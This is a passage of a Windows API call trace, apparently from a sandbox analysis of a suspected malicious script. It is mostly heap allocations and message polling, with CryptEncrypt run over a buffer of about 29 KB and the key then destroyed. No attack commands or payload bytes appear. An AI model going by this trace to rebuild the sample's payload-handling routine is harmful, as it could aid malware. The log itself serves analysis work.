lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0192.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0192.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0192.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0192.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0192.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0192.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0192.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0192.822] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0192.822] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.823] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.823] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0192.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.823] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0192.823] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.823] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.823] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.824] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.824] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0192.824] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.824] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.825] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x71e4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x71f0) returned 1 [0192.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.825] CharLowerBuffW (in: lpsz="byte[29169]", cchLength=0xb | out: lpsz="byte[29169]") returned 0xb [0192.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.827] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.828] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbff5e8*, pdwDataLen=0x87e820*=0x71e4, dwBufLen=0x71f0 | out: pbData=0xbff5e8*, pdwDataLen=0x87e820*=0x71f0) returned 1 [0192.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.829] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.829] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.830] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.830] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.830] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.830] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0192.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.830] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.830] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.831] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.831] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.831] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.831] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.831] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.831] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.831] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0192.831] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.836] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.836] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.836] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.840] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.841] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.841] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0192.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.841] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.841] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.841] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0192.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.841] CryptDestroyKey (hKey=0x90aed8) returned 1 [0192.842] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.842] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.842] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.842] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.842] HeapFree (in: hHeap=0x8a0000, 